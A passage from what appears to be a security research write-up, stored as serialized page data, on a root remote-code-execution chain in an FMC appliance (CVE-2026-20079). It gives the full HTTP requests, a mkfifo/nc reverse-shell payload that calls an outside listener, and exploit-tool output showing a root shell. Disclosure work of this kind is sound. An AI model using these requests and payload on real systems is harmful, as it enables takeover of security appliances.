only reach the ",[886,8776,8777],{},"Install"," logic under a subset of these types, and the trivial ",[886,8780,8743],{}," will not work for basic execution. Luckily, ",[886,8783,8752],{}," is also just a shell script with a slightly different format and a hardcoded string. The ",[886,8786,8773],{}," will validate a few UUID parameters and the filetype before passing it to ",[886,8789,8790],{},"SF::Update::readinessInstall"," that calls ",[886,8793,8794],{},"SF::Update::GetUpdateFileInfo",", runs a ",[1131,8797,8798],{},"large"," set of checks, and then triggers ",[886,8801,8802],{},"SF::Update::Install"," on the file. That in turn calls ",[886,8805,8806],{},"SF::Update::Install::_aqInstallTask"," that does disk space checks, validates signatures, performs a few more checks, and then queues the task into ",[886,8809,8810],{},"SF::System::Privileged::InstallUpdate"," with the filename. This package ",[1131,8813,8814],{},"finally"," calls ",[886,8817,4505],{},", which ironically checks whether the caller was run from ",[886,8820,8821],{},"SF::System"," — and if so, it marks the first command argument to be ",[886,8824,8825],{},"\u002Fusr\u002Fbin\u002Fsudo"," and runs the following ",[886,8828,1380],{}," indicating code execution can be achieved:",[1354,8831,8833],{"className":4621,"code":8832,"language":4623,"meta":219,"style":219},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n# chance of someone inputting commands\nopen(SFNULL, \"\u002Fdev\u002Fnull\");\n\nwarn Dumper($dumpcmd) if $DEBUG;\n\n# Traps exceptions for the open call.\neval\n{\n    $pid = open3(*SFNULL, *OUTH, *ERRH, @$cmd);\n};\n\n",[886,8834,8835,8840,8845,8862,8866,8886,8890,8895,8900,8905,8917],{"__ignoreMap":219},[1373,8836,8837],{"class":1375,"line":1376},[1373,8838,8839],{"class":4630},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n",[1373,8841,8842],{"class":1375,"line":220},[1373,8843,8844],{"class":4630},"# chance of someone inputting 
commands\n",[1373,8846,8847,8850,8853,8855,8858,8860],{"class":1375,"line":1266},[1373,8848,8849],{"class":1379},"open",[1373,8851,8852],{"class":4640},"(SFNULL, ",[1373,8854,183],{"class":1387},[1373,8856,8857],{"class":1391},"\u002Fdev\u002Fnull",[1373,8859,183],{"class":1387},[1373,8861,4680],{"class":4640},[1373,8863,8864],{"class":1375,"line":1852},[1373,8865,6520],{"emptyLinePlaceholder":237},[1373,8867,8868,8871,8874,8876,8879,8881,8883],{"class":1375,"line":4692},[1373,8869,8870],{"class":1379},"warn",[1373,8872,8873],{"class":4640}," Dumper(",[1373,8875,4644],{"class":1383},[1373,8877,8878],{"class":4640},"dumpcmd) ",[1373,8880,4637],{"class":4636},[1373,8882,4656],{"class":1383},[1373,8884,8885],{"class":4640},"DEBUG;\n",[1373,8887,8888],{"class":1375,"line":4724},[1373,8889,6520],{"emptyLinePlaceholder":237},[1373,8891,8892],{"class":1375,"line":4756},[1373,8893,8894],{"class":4630},"# Traps exceptions for the open call.\n",[1373,8896,8897],{"class":1375,"line":4768},[1373,8898,8899],{"class":4636},"eval\n",[1373,8901,8902],{"class":1375,"line":4792},[1373,8903,8904],{"class":4640},"{\n",[1373,8906,8907,8909,8912,8914],{"class":1375,"line":4798},[1373,8908,7362],{"class":1383},[1373,8910,8911],{"class":4640},"pid = open3(*SFNULL, *OUTH, *ERRH, ",[1373,8913,7318],{"class":1383},[1373,8915,8916],{"class":4640},"$cmd);\n",[1373,8918,8919],{"class":1375,"line":4806},[1373,8920,8921],{"class":4640},"};\n",[18,8923,8924],{},"The full process of this path execution from the file write is as follows:",[18,8926,8927,8928,8930,8931,8934,8935,8937,8938,8940,8941,8944],{},"The file write to ",[886,8929,6921],{}," is called with the ",[886,8932,8933],{},"callServerFunc"," URL parameter and an arbitrary Unix timestamp; then the body content is the JSON array containing an ordered array of parameters. 
In our case, we call the ",[886,8936,8634],{}," function and place our payload in a ",[886,8939,8752],{}," validating script that uses the JSON Unicode-escaped format for any newline characters (normal ",[886,8942,8943],{},"\\n"," will not validate, and arbitrary binary data can actually be written to the file with this technique):",[1354,8946,8948],{"className":6275,"code":8947,"language":6277,"meta":219,"style":219},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 216\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nOrigin: https:\u002F\u002F10.0.0.226\nReferer: https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\nConnection: keep-alive\n\n\n[\n\"2c33d78906e48adf429099629b0e1acf\",\n\"validateLicense\",\n\"#!\u002Fbin\u002Fsh\\u000A# This script was generated using Makeself\\u000A\\u000Arm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\u000A\"]\n",[886,8949,8950,8963,8971,8979,8988,8996,9004,9012,9020,9030,9038,9042,9046,9051,9063,9073],{"__ignoreMap":219},[1373,8951,8952,8954,8957,8959,8961],{"class":1375,"line":1376},[1373,8953,6946],{"class":4636},[1373,8955,8956],{"class":4640}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 
",[1373,8958,6290],{"class":5387},[1373,8960,2180],{"class":4640},[1373,8962,6295],{"class":5467},[1373,8964,8965,8967,8969],{"class":1375,"line":220},[1373,8966,6301],{"class":6300},[1373,8968,4606],{"class":5387},[1373,8970,6306],{"class":1391},[1373,8972,8973,8975,8977],{"class":1375,"line":1266},[1373,8974,6565],{"class":6300},[1373,8976,4606],{"class":5387},[1373,8978,6570],{"class":1391},[1373,8980,8981,8983,8985],{"class":1375,"line":1852},[1373,8982,6411],{"class":6300},[1373,8984,4606],{"class":5387},[1373,8986,8987],{"class":1391}," 216\n",[1373,8989,8990,8992,8994],{"class":1375,"line":4692},[1373,8991,6391],{"class":6300},[1373,8993,4606],{"class":5387},[1373,8995,7000],{"class":1391},[1373,8997,8998,9000,9002],{"class":1375,"line":4724},[1373,8999,6311],{"class":6300},[1373,9001,4606],{"class":5387},[1373,9003,6316],{"class":1391},[1373,9005,9006,9008,9010],{"class":1375,"line":4756},[1373,9007,7013],{"class":6300},[1373,9009,4606],{"class":5387},[1373,9011,7018],{"class":1391},[1373,9013,9014,9016,9018],{"class":1375,"line":4768},[1373,9015,7820],{"class":6300},[1373,9017,4606],{"class":5387},[1373,9019,7825],{"class":1391},[1373,9021,9022,9025,9027],{"class":1375,"line":4792},[1373,9023,9024],{"class":6300},"Referer",[1373,9026,4606],{"class":5387},[1373,9028,9029],{"class":1391}," 
https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\n",[1373,9031,9032,9034,9036],{"class":1375,"line":4798},[1373,9033,6331],{"class":6300},[1373,9035,4606],{"class":5387},[1373,9037,6336],{"class":1391},[1373,9039,9040],{"class":1375,"line":4806},[1373,9041,6520],{"emptyLinePlaceholder":237},[1373,9043,9044],{"class":1375,"line":4817},[1373,9045,6520],{"emptyLinePlaceholder":237},[1373,9047,9048],{"class":1375,"line":4825},[1373,9049,9050],{"class":1383},"[\n",[1373,9052,9053,9055,9058,9060],{"class":1375,"line":4835},[1373,9054,183],{"class":1387},[1373,9056,9057],{"class":1391},"2c33d78906e48adf429099629b0e1acf",[1373,9059,183],{"class":1387},[1373,9061,9062],{"class":1383},",\n",[1373,9064,9065,9067,9069,9071],{"class":1375,"line":4843},[1373,9066,183],{"class":1387},[1373,9068,8634],{"class":1391},[1373,9070,183],{"class":1387},[1373,9072,9062],{"class":1383},[1373,9074,9075,9077,9079,9082,9084,9087,9090,9092,9094],{"class":1375,"line":4849},[1373,9076,183],{"class":1387},[1373,9078,8747],{"class":1391},[1373,9080,9081],{"class":2326},"\\u000A",[1373,9083,8756],{"class":1391},[1373,9085,9086],{"class":2326},"\\u000A\\u000A",[1373,9088,9089],{"class":1391},"rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff",[1373,9091,9081],{"class":2326},[1373,9093,183],{"class":1387},[1373,9095,7103],{"class":1383},[18,9097,9098],{},"The server will respond with an error saying that the license is invalid:",[1354,9100,9102],{"className":6275,"code":9101,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 200 OK\nServer: Mojolicious (Perl)\nContent-Type: application\u002Fjson\nContent-Length: 219\n\n{\"data\":{\"lic\":\"#!\u002Fbin\u002Fsh\\n# This script was generated using Makeself\\n\\nrm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\n\",\"statusmsg\":\"License is 
Invalid.\\n\",\"status\":0,\"isBaseLicense\":0}}\n",[886,9103,9104,9116,9124,9132,9141,9145],{"__ignoreMap":219},[1373,9105,9106,9108,9110,9112,9114],{"class":1375,"line":1376},[1373,9107,6290],{"class":5387},[1373,9109,2180],{"class":4640},[1373,9111,6350],{"class":5467},[1373,9113,6610],{"class":5467},[1373,9115,6613],{"class":1391},[1373,9117,9118,9120,9122],{"class":1375,"line":220},[1373,9119,6371],{"class":6300},[1373,9121,4606],{"class":5387},[1373,9123,6376],{"class":1391},[1373,9125,9126,9128,9130],{"class":1375,"line":1266},[1373,9127,6391],{"class":6300},[1373,9129,4606],{"class":5387},[1373,9131,7000],{"class":1391},[1373,9133,9134,9136,9138],{"class":1375,"line":1852},[1373,9135,6411],{"class":6300},[1373,9137,4606],{"class":5387},[1373,9139,9140],{"class":1391}," 219\n",[1373,9142,9143],{"class":1375,"line":4692},[1373,9144,6520],{"emptyLinePlaceholder":237},[1373,9146,9147,9150,9153,9157,9159,9161,9163,9167,9169,9171,9174,9177,9179,9181,9184,9186,9188,9190,9192,9194,9197,9199,9201,9203,9206,9208,9210,9212,9214,9217,9219,9221,9223,9225,9227,9230,9232,9234,9236],{"class":1375,"line":4724},[1373,9148,9149],{"class":1383},"{",[1373,9151,183],{"class":9152},"saDeg",[1373,9154,9156],{"class":9155},"sEff5","data",[1373,9158,183],{"class":9152},[1373,9160,8304],{"class":1383},[1373,9162,183],{"class":9152},[1373,9164,9166],{"class":9165},"s_MOj","lic",[1373,9168,183],{"class":9152},[1373,9170,4606],{"class":1383},[1373,9172,183],{"class":9173},"sh1VR",[1373,9175,8747],{"class":9176},"sINAO",[1373,9178,8943],{"class":2326},[1373,9180,8756],{"class":9176},[1373,9182,9183],{"class":2326},"\\n\\n",[1373,9185,9089],{"class":9176},[1373,9187,8943],{"class":2326},[1373,9189,183],{"class":9173},[1373,9191,5437],{"class":1383},[1373,9193,183],{"class":9152},[1373,9195,9196],{"class":9165},"statusmsg",[1373,9198,183],{"class":9152},[1373,9200,4606],{"class":1383},[1373,9202,183],{"class":9173},[1373,9204,9205],{"class":9176},"License is 
Invalid.",[1373,9207,8943],{"class":2326},[1373,9209,183],{"class":9173},[1373,9211,5437],{"class":1383},[1373,9213,183],{"class":9152},[1373,9215,9216],{"class":9165},"status",[1373,9218,183],{"class":9152},[1373,9220,4606],{"class":1383},[1373,9222,445],{"class":5467},[1373,9224,5437],{"class":1383},[1373,9226,183],{"class":9152},[1373,9228,9229],{"class":9165},"isBaseLicense",[1373,9231,183],{"class":9152},[1373,9233,4606],{"class":1383},[1373,9235,445],{"class":5467},[1373,9237,9238],{"class":1383},"}}\n",[18,9240,9241,9242,9244,9245,9247],{},"But on the disk, the file will be deserialized from JSON and written to ",[886,9243,4484],{}," with the fully formed shell script. Finally, the ",[886,9246,4491],{}," interface is called. This also takes a set of special arguments:",[22,9249,9250,9261,9270],{},[25,9251,9252,9254,9255,9257,9258,9260],{},[886,9253,8560],{},": the function being called by the server. In our case, this is ",[886,9256,4495],{},", but in the exploit’s case can be any function that has an ",[886,9259,6915],{}," permission mark.",[25,9262,9263,9265,9266,9269],{},[886,9264,7120],{},": a JSON array that contains all the parameters for the function call in the order that they are called by the function. 
In this case, we are sending ",[886,9267,9268],{},"[\"\u002Fvar\u002Ftmp\u002Flicense.tmp\",[\"42fb13fa-82e0-47a1-b147-3d64c8b9c708\"]]"," which contains the location of install files and a random UUID that is required to select the \"local install\" option of the readiness call (theoretically, if the system has a remote install setup and the sensors’ UUIDs are known, this should also allow execution on remote sensors).",[25,9271,9272,9274],{},[886,9273,4468],{},": contains the retrieved CSRF token",[18,9276,9277],{},"Calling this will finally trigger the remote code execution as root:",[1354,9279,9281],{"className":6275,"code":9280,"language":6277,"meta":219,"style":219},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 224\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: 
*\u002F*\n\nfunction=SF::UI::DataObjectLibrary::upgradeReadinessCall&parameters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[886,9282,9283,9295,9303,9311,9320,9328,9336,9344,9352,9356],{"__ignoreMap":219},[1373,9284,9285,9287,9289,9291,9293],{"class":1375,"line":1376},[1373,9286,6946],{"class":4636},[1373,9288,7137],{"class":4640},[1373,9290,6290],{"class":5387},[1373,9292,2180],{"class":4640},[1373,9294,6295],{"class":5467},[1373,9296,9297,9299,9301],{"class":1375,"line":220},[1373,9298,6301],{"class":6300},[1373,9300,4606],{"class":5387},[1373,9302,6306],{"class":1391},[1373,9304,9305,9307,9309],{"class":1375,"line":1266},[1373,9306,6565],{"class":6300},[1373,9308,4606],{"class":5387},[1373,9310,6570],{"class":1391},[1373,9312,9313,9315,9317],{"class":1375,"line":1852},[1373,9314,6411],{"class":6300},[1373,9316,4606],{"class":5387},[1373,9318,9319],{"class":1391}," 224\n",[1373,9321,9322,9324,9326],{"class":1375,"line":4692},[1373,9323,6986],{"class":6300},[1373,9325,4606],{"class":5387},[1373,9327,6991],{"class":1391},[1373,9329,9330,9332,9334],{"class":1375,"line":4724},[1373,9331,6391],{"class":6300},[1373,9333,4606],{"class":5387},[1373,9335,7185],{"class":1391},[1373,9337,9338,9340,9342],{"class":1375,"line":4756},[1373,9339,6311],{"class":6300},[1373,9341,4606],{"class":5387},[1373,9343,6316],{"class":1391},[1373,9345,9346,9348,9350],{"class":1375,"line":4768},[1373,9347,7013],{"class":6300},[1373,9349,4606],{"class":5387},[1373,9351,7018],{"class":1391},[1373,9353,9354],{"class":1375,"line":4792},[1373,9355,6520],{"emptyLinePlaceholder":237},[1373,9357,9358],{"class":1375,"line":4798},[1373,9359,9360],{"class":4640},"function=SF::UI::DataObjectLibrary::upgradeReadinessCall&parameters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[1
354,9362,9366],{"className":9363,"code":9364,"language":9365,"meta":219,"style":219},"language-shellsession shiki shiki-themes material-theme-lighter github-light github-dark monokai","poptart@grimm $ .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \ntime=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\ntime=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\ntime=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\ntime=2026-03-19T19:00:40.702-06:00 level=SUCCESS msg=\"Authentication successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\ntime=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\ntime=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\ntime=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\ntime=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\nsh: cannot set terminal process group (14096): Inappropriate ioctl for device\nsh: no job control in this shell\nsh-5.1# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\nsh-5.1# exit\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets 
for SSL shell server\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n","shellsession",[886,9367,9368,9379,9385,9390,9395,9400,9405,9410,9415,9420,9425,9430,9435,9440,9445,9456,9461,9466,9475,9480,9485],{"__ignoreMap":219},[1373,9369,9370,9374,9376],{"class":1375,"line":1376},[1373,9371,9373],{"class":9372},"sQqfL","poptart@grimm",[1373,9375,4656],{"class":1383},[1373,9377,9378],{"class":4640}," .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \n",[1373,9380,9381],{"class":1375,"line":220},[1373,9382,9384],{"class":9383},"s91G_","time=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\n",[1373,9386,9387],{"class":1375,"line":1266},[1373,9388,9389],{"class":9383},"time=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\n",[1373,9391,9392],{"class":1375,"line":1852},[1373,9393,9394],{"class":9383},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\n",[1373,9396,9397],{"class":1375,"line":4692},[1373,9398,9399],{"class":9383},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\n",[1373,9401,9402],{"class":1375,"line":4724},[1373,9403,9404],{"class":9383},"time=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\n",[1373,9406,9407],{"class":1375,"line":4756},[1373,9408,9409],{"class":9383},"time=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\n",[1373,9411,9412],{"class":1375,"line":4768},[1373,9413,9414],{"class":9383},"time=2026-03-19T19:00:40.702-06:00 level=SUCCESS 
msg=\"Authentication successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\n",[1373,9416,9417],{"class":1375,"line":4792},[1373,9418,9419],{"class":9383},"time=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\n",[1373,9421,9422],{"class":1375,"line":4798},[1373,9423,9424],{"class":9383},"time=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\n",[1373,9426,9427],{"class":1375,"line":4806},[1373,9428,9429],{"class":9383},"time=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\n",[1373,9431,9432],{"class":1375,"line":4817},[1373,9433,9434],{"class":9383},"time=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\n",[1373,9436,9437],{"class":1375,"line":4825},[1373,9438,9439],{"class":9383},"sh: cannot set terminal process group (14096): Inappropriate ioctl for device\n",[1373,9441,9442],{"class":1375,"line":4835},[1373,9443,9444],{"class":9383},"sh: no job control in this shell\n",[1373,9446,9447,9450,9453],{"class":1375,"line":4843},[1373,9448,9449],{"class":9372},"sh-5.1",[1373,9451,9452],{"class":1383},"#",[1373,9454,9455],{"class":4640}," id\n",[1373,9457,9458],{"class":1375,"line":4849},[1373,9459,9460],{"class":9383},"id\n",[1373,9462,9463],{"class":1375,"line":4877},[1373,9464,9465],{"class":9383},"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\n",[1373,9467,9468,9470,9472],{"class":1375,"line":4915},[1373,9469,9449],{"class":9372},[1373,9471,9452],{"class":1383},[1373,9473,9474],{"class":4640}," exit\n",[1373,9476,9477],{"class":1375,"line":4931},[1373,9478,9479],{"class":9383},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for SSL shell 
server\"\n",[1373,9481,9482],{"class":1375,"line":4947},[1373,9483,9484],{"class":9383},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\n",[1373,9486,9487],{"class":1375,"line":4952},[1373,9488,9489],{"class":9383},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n",[61,9491,9493],{"id":9492},"a-note-on-perl-storables","A Note on Perl Storables",[18,9495,9496,9497,9502,9503,9506,9507,9509,9510,4606],{},"The FMC system utilizes the Perl ",[47,9498,9501],{"href":9499,"rel":9500},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable",[51],"Storable"," module all over the place and even does C foreign-function calls to load Perl objects in multiple places. During our testing, we identified that the ",[886,9504,9505],{},"sajaxintf.cgi"," endpoint allowed a ",[886,9508,6935],{}," call that ends up trickling into the following suspicious few lines in ",[886,9511,9512],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm",[1354,9514,9516],{"className":4621,"code":9515,"language":4623,"meta":219,"style":219},"sub DeSerialize\n{\n    my $options = shift();\n\n    if (!defined($options->{data}) && !defined($options->{filename}) && !defined($options->{fd}))\n    {\n        return undef;\n    }\n\n    my $deserialized_data;\ntry\n{\n    local $Storable::Eval = $Storable::Eval = 1;\n\n    if (defined($options->{fd}))\n    {\n        $deserialized_data = Storable::fd_retrieve($options->{fd});\n    }\n    elsif (defined($options->{filename}))\n    {\n        my $fn = SF::Reloc::RelocateFilename($options->{filename});\n\n        if(-e $fn)\n        {\n            if ($options->{lock})\n            {\n                $deserialized_data = Storable::lock_retrieve($fn);\n            }\n            else\n            {\n                $deserialized_data = Storable::retrieve($fn);\n            }\n        }\n        else\n        {\n            warn \"Unable to locate file for retrieval: $options->{filename}\";\n   
         return undef;\n        }\n    }\n    elsif ($options->{data})\n    {\n        $deserialized_data = Storable::thaw($options->{data});\n    }\n}\n",[886,9517,9518,9525,9529,9545,9549,9609,9614,9622,9626,9630,9639,9644,9648,9663,9667,9689,9693,9713,9717,9740,9744,9765,9769,9784,9789,9810,9815,9828,9833,9838,9842,9853,9857,9862,9867,9871,9892,9901,9906,9911,9930,9935,9955,9960],{"__ignoreMap":219},[1373,9519,9520,9522],{"class":1375,"line":1376},[1373,9521,7294],{"class":7293},[1373,9523,9524],{"class":7297}," DeSerialize\n",[1373,9526,9527],{"class":1375,"line":220},[1373,9528,8904],{"class":4640},[1373,9530,9531,9533,9535,9538,9541,9543],{"class":1375,"line":1266},[1373,9532,4653],{"class":4652},[1373,9534,4656],{"class":1383},[1373,9536,9537],{"class":4640},"options = ",[1373,9539,9540],{"class":1379},"shift",[1373,9542,7514],{"class":1383},[1373,9544,4912],{"class":4640},[1373,9546,9547],{"class":1375,"line":1852},[1373,9548,6520],{"emptyLinePlaceholder":237},[1373,9550,9551,9553,9556,9558,9560,9562,9565,9567,9569,9571,9574,9576,9578,9580,9582,9584,9586,9589,9591,9593,9595,9597,9599,9601,9603,9606],{"class":1375,"line":4692},[1373,9552,4695],{"class":4636},[1373,9554,9555],{"class":4640}," (!",[1373,9557,7350],{"class":1379},[1373,9559,1384],{"class":4640},[1373,9561,4644],{"class":1383},[1373,9563,9564],{"class":4640},"options",[1373,9566,4667],{"class":1397},[1373,9568,9149],{"class":4640},[1373,9570,9156],{"class":2326},[1373,9572,9573],{"class":4640},"}) && 
!",[1373,9575,7350],{"class":1379},[1373,9577,1384],{"class":4640},[1373,9579,4644],{"class":1383},[1373,9581,9564],{"class":4640},[1373,9583,4667],{"class":1397},[1373,9585,9149],{"class":4640},[1373,9587,9588],{"class":2326},"filename",[1373,9590,9573],{"class":4640},[1373,9592,7350],{"class":1379},[1373,9594,1384],{"class":4640},[1373,9596,4644],{"class":1383},[1373,9598,9564],{"class":4640},[1373,9600,4667],{"class":1397},[1373,9602,9149],{"class":4640},[1373,9604,9605],{"class":2326},"fd",[1373,9607,9608],{"class":4640},"}))\n",[1373,9610,9611],{"class":1375,"line":4724},[1373,9612,9613],{"class":4640},"    {\n",[1373,9615,9616,9618,9620],{"class":1375,"line":4756},[1373,9617,4918],{"class":4636},[1373,9619,7480],{"class":1379},[1373,9621,4912],{"class":4640},[1373,9623,9624],{"class":1375,"line":4768},[1373,9625,4795],{"class":4640},[1373,9627,9628],{"class":1375,"line":4792},[1373,9629,6520],{"emptyLinePlaceholder":237},[1373,9631,9632,9634,9636],{"class":1375,"line":4798},[1373,9633,4653],{"class":4652},[1373,9635,4656],{"class":1383},[1373,9637,9638],{"class":4640},"deserialized_data;\n",[1373,9640,9641],{"class":1375,"line":4806},[1373,9642,9643],{"class":4640},"try\n",[1373,9645,9646],{"class":1375,"line":4817},[1373,9647,8904],{"class":4640},[1373,9649,9650,9653,9655,9658,9660],{"class":1375,"line":4825},[1373,9651,9652],{"class":4652},"    local",[1373,9654,4656],{"class":1383},[1373,9656,9657],{"class":4640},"Storable::Eval = ",[1373,9659,4644],{"class":1383},[1373,9661,9662],{"class":4640},"Storable::Eval = 
1;\n",[1373,9664,9665],{"class":1375,"line":4835},[1373,9666,6520],{"emptyLinePlaceholder":237},[1373,9668,9669,9671,9673,9675,9677,9679,9681,9683,9685,9687],{"class":1375,"line":4843},[1373,9670,4695],{"class":4636},[1373,9672,4641],{"class":4640},[1373,9674,7350],{"class":1379},[1373,9676,1384],{"class":4640},[1373,9678,4644],{"class":1383},[1373,9680,9564],{"class":4640},[1373,9682,4667],{"class":1397},[1373,9684,9149],{"class":4640},[1373,9686,9605],{"class":2326},[1373,9688,9608],{"class":4640},[1373,9690,9691],{"class":1375,"line":4849},[1373,9692,9613],{"class":4640},[1373,9694,9695,9697,9700,9702,9704,9706,9708,9710],{"class":1375,"line":4877},[1373,9696,4727],{"class":1383},[1373,9698,9699],{"class":4640},"deserialized_data = Storable::fd_retrieve(",[1373,9701,4644],{"class":1383},[1373,9703,9564],{"class":4640},[1373,9705,4667],{"class":1397},[1373,9707,9149],{"class":4640},[1373,9709,9605],{"class":2326},[1373,9711,9712],{"class":4640},"});\n",[1373,9714,9715],{"class":1375,"line":4915},[1373,9716,4795],{"class":4640},[1373,9718,9719,9722,9724,9726,9728,9730,9732,9734,9736,9738],{"class":1375,"line":4931},[1373,9720,9721],{"class":4636},"    elsif",[1373,9723,4641],{"class":4640},[1373,9725,7350],{"class":1379},[1373,9727,1384],{"class":4640},[1373,9729,4644],{"class":1383},[1373,9731,9564],{"class":4640},[1373,9733,4667],{"class":1397},[1373,9735,9149],{"class":4640},[1373,9737,9588],{"class":2326},[1373,9739,9608],{"class":4640},[1373,9741,9742],{"class":1375,"line":4947},[1373,9743,9613],{"class":4640},[1373,9745,9746,9748,9750,9753,9755,9757,9759,9761,9763],{"class":1375,"line":4952},[1373,9747,4852],{"class":4652},[1373,9749,4656],{"class":1383},[1373,9751,9752],{"class":4640},"fn = 
SF::Reloc::RelocateFilename(",[1373,9754,4644],{"class":1383},[1373,9756,9564],{"class":4640},[1373,9758,4667],{"class":1397},[1373,9760,9149],{"class":4640},[1373,9762,9588],{"class":2326},[1373,9764,9712],{"class":4640},[1373,9766,9767],{"class":1375,"line":6776},[1373,9768,6520],{"emptyLinePlaceholder":237},[1373,9770,9771,9774,9776,9779,9781],{"class":1375,"line":6781},[1373,9772,9773],{"class":4636},"        if",[1373,9775,1384],{"class":4640},[1373,9777,9778],{"class":1397},"-e",[1373,9780,4656],{"class":1383},[1373,9782,9783],{"class":4640},"fn)\n",[1373,9785,9786],{"class":1375,"line":7524},[1373,9787,9788],{"class":4640},"        {\n",[1373,9790,9791,9794,9796,9798,9800,9802,9804,9807],{"class":1375,"line":7530},[1373,9792,9793],{"class":4636},"            if",[1373,9795,4641],{"class":4640},[1373,9797,4644],{"class":1383},[1373,9799,9564],{"class":4640},[1373,9801,4667],{"class":1397},[1373,9803,9149],{"class":4640},[1373,9805,9806],{"class":2326},"lock",[1373,9808,9809],{"class":4640},"})\n",[1373,9811,9812],{"class":1375,"line":7546},[1373,9813,9814],{"class":4640},"            {\n",[1373,9816,9817,9820,9823,9825],{"class":1375,"line":7571},[1373,9818,9819],{"class":1383},"                $",[1373,9821,9822],{"class":4640},"deserialized_data = 